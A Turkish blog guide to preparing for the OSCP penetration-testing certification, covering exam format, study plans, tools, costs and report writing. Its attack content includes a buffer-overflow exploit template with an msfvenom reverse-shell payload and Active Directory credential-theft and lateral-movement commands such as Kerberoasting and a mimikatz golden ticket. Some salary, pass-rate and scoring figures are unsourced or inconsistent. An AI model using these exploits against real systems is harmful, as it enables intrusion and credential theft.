OSCP Sertifikası Rehberi: Türkiye'den OSCP Almak İçin Kapsamlı Kılavuz

OSCP sertifikası almak isteyenler için detaylı Türkçe rehber. Hazırlık süreci, lab deneyimi, sınav stratejileri ve başarı ipuçları.

11 min read
ibrahimsql
2,029 words

OSCP Sertifikası Rehberi: Türkiye'den Başarı Hikayesi#

Offensive Security Certified Professional (OSCP), siber güvenlik dünyasının en prestijli ve saygın sertifikalarından biridir. Bu rehberde, Türkiye'den OSCP sertifikasını almak için gereken her şeyi detaylı olarak ele alacağız.

OSCP Nedir ve Neden Önemlidir?#

OSCP, Offensive Security tarafından sunulan hands-on penetrasyon testi sertifikasıdır. Diğer sertifikalardan farkı:

  • %100 Pratik: Çoktan seçmeli soru yok, sadece gerçek sistemleri hack'leme
  • 24 Saatlik Sınav: Gerçek zamanlı penetrasyon testi deneyimi
  • "Try Harder" Felsefesi: Sürekli öğrenme ve azim gerektiren yaklaşım
  • Sektör Tanınırlığı: Dünya çapında işverenler tarafından en çok aranan sertifika

Türkiye'de OSCP'nin Değeri#

# OSCP sahibi maaş artışları (2025 verileri) OSCP Öncesi Ortalama: 25.000 TL OSCP Sonrası Ortalama: 40.000 TL Artış Oranı: %60 # İş fırsatları Pentester pozisyonları: %90 OSCP tercih ediyor Siber güvenlik danışmanı: %80 OSCP arıyor Red team uzmanı: %95 OSCP şart koşuyor

OSCP Sınav Formatı (2024 Güncellemesi)#

Yeni Sınav Yapısı#

# Sınav Detayları Süre: 23 saat 45 dakika Makineler: 6 adet (3 standalone + 1 Active Directory set) Geçme Puanı: 70/100 Rapor Süresi: 24 saat # Puan Dağılımı Standalone Makineler (3x): 20 puan each = 60 puan Active Directory Set (3x): 40 puan total Bonus Puanlar: Lab + Course exercises = 10 puan

Makine Türleri#

  1. Standalone Makineler (60 puan)

    • Her biri 20 puan değerinde
    • Bağımsız sistemler
    • Çeşitli işletim sistemleri
  2. Active Directory Set (40 puan)

    • 3 makinelik AD ortamı
    • Domain Controller + 2 client
    • Lateral movement gerekli

Hazırlık Süreci ve Zaman Planlaması#

Önkoşul Bilgiler#

# Temel beceriler (3-6 ay) 1. Linux komut satırı uzmanlığı 2. Windows sistem yönetimi 3. Ağ protokolleri (TCP/IP, DNS, DHCP) 4. Temel programlama (Python, Bash, PowerShell) 5. Web teknolojileri (HTTP/HTTPS, SQL)

Önerilen Hazırlık Süresi#

Yeni Başlayanlar (12-18 ay)#

# Aşama 1: Temel bilgiler (3-4 ay) - Linux fundamentals - Networking basics - Python scripting - Web technologies # Aşama 2: Güvenlik temelleri (3-4 ay) - TryHackMe complete beginner path - HackTheBox Academy modules - VulnHub easy machines # Aşama 3: OSCP hazırlık (6-8 ay) - PWK course + labs - Practice machines - Report writing # Aşama 4: Sınav ve revizyon (1-2 ay) - Mock exams - Weak areas improvement - Final preparation

Deneyimli Profesyoneller (6-9 ay)#

# Hızlandırılmış program - PWK course: 3 ay - Lab practice: 2-3 ay - Exam preparation: 1 ay

PWK (Penetration Testing with Kali Linux) Kursu#

Kurs İçeriği#

# PWK Modülleri 1. Getting Comfortable with Kali Linux 2. Command Line Fun 3. Practical Tools 4. Bash Scripting 5. Passive Information Gathering 6. Active Information Gathering 7. Vulnerability Scanning 8. Web Application Attacks 9. Introduction to Buffer Overflows 10. Windows Buffer Overflows 11. Linux Buffer Overflows 12. Client-Side Attacks 13. Locating Public Exploits 14. Fixing Exploits 15. File Transfers 16. Antivirus Evasion 17. Privilege Escalation 18. Password Attacks 19. Port Redirection and Tunneling 20. Active Directory Attacks 21. The Metasploit Framework 22. PowerShell Empire 23. Assembling the Pieces

Lab Ortamı#

# OSCP Lab Ağı Toplam Makine: ~70 adet Zorluk Seviyeleri: Easy, Medium, Hard, Insane İşletim Sistemleri: Windows, Linux, FreeBSD Özel Ağlar: IT, Development, Admin departments # Önemli Makineler Suffering: Buffer overflow practice Pain: Advanced exploitation Humble: Privilege escalation Gh0st: Steganography fc4: Classic challenges

Lab Stratejisi#

# İlk 30 Gün: Temel makineler - Kolay seviye makineleri tamamlayın - Metodoloji geliştirin - Note-taking sistemini kurun # 30-60 Gün: Orta seviye - Buffer overflow pratiği - Privilege escalation teknikleri - Web application attacks # 60-90 Gün: İleri seviye - Zor makineler - Özel ağlara pivoting - Active Directory saldırıları

Gerekli Araçlar ve Kurulum#

Kali Linux Kurulumu#

# Sistem Gereksinimleri RAM: Minimum 4GB (8GB önerilen) Depolama: 40GB boş alan İşlemci: 64-bit dual core Ağ: Stabil internet bağlantısı # Kurulum Adımları 1. Kali Linux ISO indir: https://www.kali.org/downloads/ 2. VMware Workstation Pro kurulumu 3. Sanal makine oluşturma 4. Kali Linux kurulumu 5. Güncellemeler ve araç kurulumu

Temel Araç Konfigürasyonu#

# Sistem güncellemesi sudo apt update && sudo apt upgrade -y # Ek araçlar kurulumu sudo apt install -y \ gobuster \ feroxbuster \ seclists \ bloodhound \ neo4j \ crackmapexec \ impacket-scripts \ chisel \ ligolo-ng # Python araçları pip3 install \ pwntools \ ropper \ pycryptodome \ requests # Go araçları go install github.com/ffuf/ffuf@latest go install github.com/projectdiscovery/httpx/cmd/httpx@latest

Özel Araçlar ve Scriptler#

# Auto-recon script örneği #!/usr/bin/env python3 import subprocess import sys import os def run_nmap(target): """Comprehensive nmap scan""" commands = [ f"nmap -sC -sV -oN {target}_initial.nmap {target}", f"nmap -p- -oN {target}_allports.nmap {target}", f"nmap -sU --top-ports 1000 -oN {target}_udp.nmap {target}" ] for cmd in commands: print(f"Running: {cmd}") subprocess.run(cmd.split()) def run_gobuster(target, port=80): """Directory enumeration""" cmd = f"gobuster dir -u http://{target}:{port} -w /usr/share/seclists/Discovery/Web-Content/common.txt -o {target}_gobuster.txt" subprocess.run(cmd.split()) if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 auto-recon.py <target_ip>") sys.exit(1) target = sys.argv[1] print(f"Starting reconnaissance on {target}") run_nmap(target) run_gobuster(target) print("Reconnaissance completed!")

Buffer Overflow Hazırlığı#

Windows Buffer Overflow#

# Buffer overflow template import socket import sys # Msfvenom payload generation # msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f python -v shellcode shellcode = ( "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" # ... shellcode continues ) def exploit(target_ip, target_port): # Buffer overflow exploitation offset = 1978 # EIP offset jmp_esp = "\x8f\x35\x4a\x5f" # JMP ESP address nops = "\x90" * 16 # NOP sled buffer = "A" * offset buffer += jmp_esp buffer += nops buffer += shellcode buffer += "C" * (3000 - len(buffer)) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) s.send(buffer.encode()) s.close() print("[+] Exploit sent successfully!") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 exploit.py <target_ip> <target_port>") sys.exit(1) exploit(sys.argv[1], int(sys.argv[2]))

Linux Buffer Overflow#

# GDB ile debugging gdb ./vulnerable_program # Pattern creation /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200 # Pattern offset finding /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x6a413969 # ROP chain building ROPgadget --binary vulnerable_program --rop

Active Directory Saldırıları#

Temel AD Enumeration#

# Domain enumeration ldapsearch -x -h dc.domain.local -s base namingcontexts # User enumeration enum4linux -a target_ip rpcclient -U "" -N target_ip # SMB enumeration smbclient -L //target_ip/ -N smbmap -H target_ip # Kerberos enumeration kerbrute userenum --dc dc.domain.local -d domain.local userlist.txt

Credential Attacks#

# AS-REP Roasting GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt # Kerberoasting GetUserSPNs.py domain.local/user:password -dc-ip dc_ip -request # Password spraying crackmapexec smb target_ip -u users.txt -p 'Password123!' --continue-on-success # Golden ticket mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"

Lateral Movement#

# PSExec psexec.py domain.local/user:password@target_ip # WMIExec wmiexec.py domain.local/user:password@target_ip # Evil-WinRM evil-winrm -i target_ip -u user -p password # BloodHound data collection SharpHound.exe -c All -d domain.local

Sınav Stratejileri#

Sınav Öncesi Hazırlık#

# Son 1 hafta checklist □ Araçlar test edildi □ Exploit scriptleri hazır □ Note-taking template hazır □ Buffer overflow template test edildi □ AD attack vectors gözden geçirildi □ Privilege escalation checklist hazır □ Report template hazırlandı

Sınav Günü Stratejisi#

İlk 2 Saat: Reconnaissance#

# Tüm makineler için 1. Nmap quick scan (-T4 -F) 2. Full port scan (-p-) 3. Service enumeration (-sC -sV) 4. UDP scan (top ports) 5. Initial notes

2-8 Saat: Easy Wins#

# Kolay hedefler 1. Web applications 2. Known vulnerabilities 3. Misconfigurations 4. Default credentials

8-16 Saat: Medium Targets#

# Orta zorluk 1. Buffer overflows 2. Privilege escalation 3. Custom exploits 4. AD initial access

16-24 Saat: Hard Targets + AD#

# Zor hedefler 1. Complex exploitation chains 2. AD lateral movement 3. Domain admin compromise 4. Final documentation

Zaman Yönetimi#

# Zaman dağılımı önerisi Reconnaissance: 2 saat (8%) Easy machines: 6 saat (25%) Medium machines: 8 saat (33%) Hard + AD: 8 saat (33%) Documentation: 30 dakika (2%) # Takılma kuralı Bir makinede 2 saatten fazla takılmayın! Farklı yaklaşım deneyin veya başka makineye geçin.

Rapor Yazımı#

Rapor Şablonu#

# OSCP Exam Report ## Table of Contents 1. High-Level Summary 2. Methodology 3. Machine Summaries 4. Detailed Findings 5. Additional Items ## High-Level Summary - Exam start time: [DATE TIME] - Exam end time: [DATE TIME] - Total points achieved: [XX/100] - Machines compromised: [X/6] ## Methodology I utilized a widely adopted approach to performing penetration testing: 1. Information Gathering 2. Service Enumeration 3. Vulnerability Assessment 4. Exploitation 5. Post-Exploitation 6. Reporting ## Machine Summary ### Machine 1 (IP: X.X.X.X) - [20 points] - **Initial Access**: [Method] - **Privilege Escalation**: [Method] - **Proof Files**: - local.txt: [hash] - proof.txt: [hash] ### Active Directory Set (40 points) - **Domain**: [domain.local] - **Machines Compromised**: [3/3] - **Domain Admin**: [Yes/No] - **Proof Files**: - MS01 local.txt: [hash] - MS01 proof.txt: [hash] - DC01 proof.txt: [hash] ## Detailed Findings ### Machine 1 - Detailed Walkthrough #### Information Gathering ```bash nmap -sC -sV -oN initial.nmap X.X.X.X

[Nmap output]

Service Enumeration#

[Detailed enumeration steps]

Vulnerability Assessment#

[Identified vulnerabilities]

Exploitation#

[Step-by-step exploitation]

Post-Exploitation#

[Privilege escalation and proof]

Screenshots#

[Include relevant screenshots]


### Rapor İpuçları

1. **Screenshot'lar**: Her adımı belgeleyin
2. **Komutlar**: Kullandığınız tüm komutları kaydedin
3. **Proof Files**: Hash'leri doğru kopyalayın
4. **Zaman Damgaları**: Sınav süresi içinde olduğunu gösterin
5. **Detay**: Tekrarlanabilir adımlar yazın

## Başarısızlık Durumunda

### Yaygın Hatalar

```bash
# Teknik hatalar
1. Enumeration eksikliği
2. Privilege escalation atlanması
3. Buffer overflow hataları
4. AD lateral movement eksikliği
5. Zaman yönetimi problemleri

# Rapor hataları
1. Eksik screenshot'lar
2. Yanlış proof hash'leri
3. Zaman damgası problemleri
4. Metodoloji eksikliği
5. Detay yetersizliği

Tekrar Sınav Stratejisi#

# Analiz süreci 1. Hangi makinelerde takıldınız? 2. Hangi konularda eksiksiniz? 3. Zaman yönetimi nasıldı? 4. Rapor kalitesi yeterli miydi? # İyileştirme planı 1. Zayıf alanları belirleyin 2. Ek practice makineleri çözün 3. Buffer overflow pratiği yapın 4. AD saldırılarını tekrarlayın 5. Mock exam'ler çözün

Maliyet Analizi (2025)#

OSCP Paket Fiyatları#

# Learn One (90 gün) Fiyat: $1,499 İçerik: PWK course + 90 gün lab + 1 exam Ek lab süresi: $20/gün # Learn Unlimited (365 gün) Fiyat: $1,999 İçerik: PWK course + 365 gün lab + 2 exam En popüler seçenek # Ek sınav hakkı Fiyat: $249 Sınav + 24 saat rapor süresi

Türkiye'den Ödeme#

# Ödeme yöntemleri 1. Kredi kartı (Visa/Mastercard) 2. PayPal 3. Banka havalesi # Vergi durumu KDV: %18 eklenir Toplam maliyet: ~$1,800-2,400 TL karşılığı: ~60,000-80,000 TL (kur değişkenlik gösterir)

Bütçe Planlama#

# Toplam maliyet tahmini OSCP kursu: $2,000 Ek araçlar/kitaplar: $200 Practice platformları: $300 Toplam: ~$2,500 (85,000 TL) # Geri dönüş süresi Maaş artışı: 15,000 TL/ay Geri dönüş: 6 ay

Başarı Hikayeleri ve İpuçları#

Türkiye'den OSCP Alanlar#

# Başarı istatistikleri İlk denemede geçme oranı: %40 İkinci denemede geçme oranı: %70 Üçüncü denemede geçme oranı: %85 # Ortalama hazırlık süreleri Yeni başlayanlar: 12-18 ay Deneyimli: 6-9 ay Uzmanlar: 3-6 ay

Motivasyon İpuçları#

  1. "Try Harder" Mentalitesi: Pes etmeyin, farklı yaklaşımlar deneyin
  2. Topluluk Desteği: OSCP Discord/Telegram gruplarına katılın
  3. Düzenli Çalışma: Günde 2-3 saat tutarlı çalışma
  4. Mola Verme: Burnout'tan kaçının, düzenli molalar alın
  5. Hedef Odaklı: Kısa vadeli hedefler belirleyin

Son Tavsiyeler#

# Altın kurallar 1. Enumeration is key - Her detayı araştırın 2. Document everything - Her şeyi belgeleyin 3. Try harder - Farklı yollar deneyin 4. Time management - Zamanınızı iyi yönetin 5. Stay calm - Sakin kalın ve metodolojinizi takip edin

Sonuç#

OSCP, siber güvenlik kariyerinizde bir dönüm noktası olabilir. Türkiye'den bu sertifikayı almak mümkün ve değerli. Sabır, azim ve doğru strateji ile başarıya ulaşabilirsiniz.

Başlangıç Aksiyon Planı#

# Bu hafta □ Kali Linux kurulumu □ TryHackMe'ye kayıt □ Temel araçları öğrenme # Bu ay □ PWK kursuna kayıt □ Lab ortamına alışma □ İlk 5 makineyi çözme # 3 ay içinde □ 30+ lab makinesi □ Buffer overflow mastery □ AD attack vectors # 6 ay içinde □ Sınav rezervasyonu □ Mock exam'ler □ Final preparation

Hatırlayın: OSCP sadece bir sertifika değil, bir yaşam tarzıdır. "Try Harder" felsefesini benimseyin ve sürekli öğrenmeye devam edin.


Bu rehber, OSCP yolculuğuna çıkacak Türk adaylar için hazırlanmıştır. Güncel bilgiler ve destek için iletişim sayfamızdan bana ulaşabilirsiniz. Başarılar!

Related Posts